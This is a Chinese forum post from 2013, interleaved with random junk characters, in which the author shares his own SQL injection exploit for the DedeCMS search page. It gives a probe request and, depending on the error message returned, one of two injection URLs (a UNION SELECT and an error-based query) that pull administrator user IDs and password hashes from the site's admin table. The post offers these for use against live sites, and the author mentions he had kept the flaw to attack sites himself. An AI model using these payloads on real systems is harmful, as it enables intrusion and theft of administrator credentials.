转载不加作者名的没JJ! q* U# b9 P$ v2 l* X0 G1 q
' E0 y% X3 Y8 }) {
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
6 g r4 F8 Y0 |# F0 V: j3 B& g, z
+ I4 G7 g8 c4 ?0 L* A3 J. |* s既然已经发出来了,我就把我自己搞的exp发下吧。。唉。& u7 h9 k" F: Y' }, H! l u
0 d6 c `5 c$ P我一般是这样测试的:
, M! Q9 N- [; V2 V1 s; `" H9 I) ~
8 p/ h+ q2 B. ^提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a: X$ g7 Z( u+ i' k$ r
; k7 Y' V% h4 o r转载不加作者名的没JJ# h Q" V" Z6 x2 l& A% v) C: o
) ]3 H! f! {1 I3 t
作者:鬼哥2 T" Q- `; C- |
" Q' R9 s& ?/ `, P
& v( `( t0 k A6 H9 }" V- k
- a9 I# q3 \+ u看结果如果提示
* M8 r% e. M: X# T/ }2 p7 r( E; [/ N F( q/ S5 X- |" M
Safe Alert: Request Error step 2 !1 @% Y8 A9 h: x( [- L9 \# D
- S9 U# f$ |7 E* i) h6 m那么直接用下面的exp$ Q- R! U7 w! G9 y+ k. ?' d
: S( {0 ^$ _; v# I# `0 Pxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
! c- S9 Y! D5 i1 `& x. N$ y4 Q, M5 @5 o4 m
& N3 h) [7 _) e
看结果如果提示
6 n2 b, C" P, k2 k9 I& {/ ]. u$ L( d% X6 P; ^
Safe Alert: Request Error step 1 !
" N) p% k# b& F& T( K6 d" s
% N5 y! c9 ?/ X0 ~. n6 a那么直接用下面的exp9 m9 p/ f* z$ q3 r
. D% f3 l' N5 W' X* ? }xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
! \+ x/ l+ L E, v9 _+ J
) Z% a: s: i5 H: X1 U$ ^
! P" n* P$ F9 A. l如果正常显示证明漏洞不存在了。
5 r T; p. m `3 @3 K
" W+ _% E2 p+ s i转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对